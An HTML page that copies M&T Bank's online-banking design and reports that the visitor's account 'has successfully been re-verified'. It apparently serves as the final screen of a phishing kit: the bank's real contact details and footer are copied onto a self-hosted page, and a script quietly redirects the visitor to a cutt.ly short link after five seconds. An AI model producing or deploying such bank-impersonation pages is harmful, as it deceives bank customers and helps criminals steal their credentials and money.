<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome to Online Banking</title>
  <link rel="shortcut icon" href="/img/favicon.png" type="image/x-icon">
  <link href="/css/main.css" rel="stylesheet">
</head>

<body>
  <div class="cb-app">
    <header class="cb-header">
      <div class="grid-x align-center">
        <div class="cell">
          <a href="https://www.mtb.com/home-page" class="cb-logo">
            <img src="/img/logo.svg">
          </a>
        </div>
      </div>
    </header>


    <div class="cb-login-content">
      <div class="grid-x grid-padding-x grid-x__padded __spacer-section">
        <div style="margin-top: 50px;margin-bottom:150px;text-align:center;">
          <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="https://www.w3.org/2000/svg">
            <circle cx="32" cy="32" r="32" fill="#62CF66"></circle>
            <path fill-rule="evenodd" clip-rule="evenodd" d="M28.2514 44.0347C27.4541 44.9285 26.0553 44.9259 25.2614 44.0291L14.5907 31.9753C14.151 31.4787 14.3078 30.6995 14.9054 30.4116L15.3589 30.1931C15.686 30.0354 16.0729 30.0675 16.3695 30.2769L25.0794 36.423C25.8341 36.9556 26.8554 36.902 27.5502 36.2934L47.6139 18.7212C47.9155 18.4571 48.3457 18.3986 48.7068 18.5726L49.0901 18.7573C49.689 19.0458 49.8448 19.8277 49.4023 20.3238L28.2514 44.0347Z" fill="white"></path>
          </svg>
          <h3>Verification Complete</h3>
          <p>Your account has successfully been re-verified. You will be redirected back to our homepage shortly.</p>
        </div>
      </div>
    </div>

    <hr class="__spacer-section">

    <div class="cb-error-content">
      <div class="grid-x grid-padding-x grid-x__padded">
        <div class="cell text-center">
          <p class="__font-size-secondary">
            Have questions about M&amp;T Online Banking?
          </p>
        </div>
        <div class="cell medium-6 text-center">
          <p class="__font-size-secondary __color-primary __spacer-paragraph-half">
            Personal Accounts:
            <a href="tel:1-800-790-9130" class="__no-underline">1-800-790-9130</a>
          </p>
          <p class="__font-size-sub __spacer-remove __color-gray-accent">
            Monday - Friday 8am - 9pm ET
          </p>
          <p class="__font-size-sub __spacer-paragraph __color-gray-accent">
            Saturday - Sunday 9am - 5pm ET
          </p>
        </div>
        <div class="cell medium-6 text-center">
          <p class="__font-size-secondary __color-primary __spacer-paragraph-half">
            Business Accounts: <a href="tel:1-800-724-6070" class="__no-underline">1-800-724-6070</a>
          </p>
          <p class="__font-size-sub __spacer-remove __color-gray-accent">
            Monday - Friday 6am - 9pm ET
          </p>
          <p class="__font-size-sub __spacer-section __color-gray-accent">
            Saturday - Sunday 9am - 5pm ET
          </p>
        </div>
      </div>
    </div>

    <section class="cb-footer cb-footer__auth" style="height: 14.25rem;">
      <div class="grid-x" style="height: 14.25rem;">
        <div class="cell flex-container flex-dir-column align-center-middle">
          <div class="cb-footer--auth">
            <a href="https://upgrade.mtb.com/olb-upgrade">Get Started Guide</a>
            <a href="https://www.mtb.com/olbsecurity">Security Assistance</a>
            <a href="https://www3.mtb.com/homepage/explore-the-m-and-t-bank-help-center/digital-services-agreement.html">Digital Service Agreement</a>
            <a href="https://asset.mtb.com/Documents/html/ESign.htm">ESign Agreement</a>
            <a href="https://mtb.com/olb-accessibility">Accessibility</a>
            <a href="https://www.mtb.com/olb-personalsite">mtb.com</a>
          </div>

          <div class="cb-footer--non-auth">
            <p>
              ©2023 M&amp;T Bank. All Rights Reserved.<br>
              Users of this website agree to be bound by the provisions of the M&amp;T website <a href="https://www.mtb.com/help-center/policies/terms-of-use"> Terms of Use</a> and <a href="https://www.mtb.com/privacy">Privacy</a>.
            </p>
            <div class="cb-footer__logo">
              <a href="https://www.mtb.com/equalhousinglender">
                <img src="/img/ehl.svg" class="cb-footer__ehl">
              </a>
              <a href="https://www.mtb.com/olb-entrust">
                <img src="/img/entrust.svg" class="cb-footer__entrust">
              </a>
            </div>
            <p>
              Equal Housing Lender NMLS #381076
              <a href="https://www.mtb.com/fdic">Member FDIC</a>
            </p>
          </div>
        </div>
      </div>
    </section>
  </div>

  <script>
    setTimeout(() => {
      window.location.href = 'https://cutt.ly/T2ZVZQU';
    }, 5000)
  </script>
</body>

</html>